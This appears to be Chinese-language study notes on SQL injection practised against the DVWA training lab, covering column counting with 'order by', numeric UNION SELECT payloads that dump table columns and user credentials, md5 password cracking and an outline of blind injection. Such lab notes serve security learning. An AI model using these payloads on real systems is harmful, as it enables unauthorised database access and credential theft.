Web网站（对外门户）

原理：not>and>or(优先级)

一.低级注入

order by的作用是对字段进行排序，如order by 5，根据第五个字段

进行排序，如果一共有4个字段，输入order by 5系统就会报错不

知道怎么排序，所以可以用order by来判断有多少个字段。

1.查询版本和数据库名称

1. 获取DVWA数据库中的表名

1. 获取表中的字段名

1. 获取某一字段下的列值

密码可以用md5进行解密

二.中级注入

1 and 1=1# 正常

1‘ and 1=1# 错误

数字型注入

获取字段名，在输入框中输入1 union select

group_concat(column_name),2 from information_schema.columns where

table_name=0x7573657273

获取用户账户和密码，在输入框中输入1 union select

group_concat(user,0x35,password),2 from users

三.SQL盲注

v 获取数据库长度

v 逐字猜解数据库名

v 猜解表数量 （两个表，表的字长各为5和9）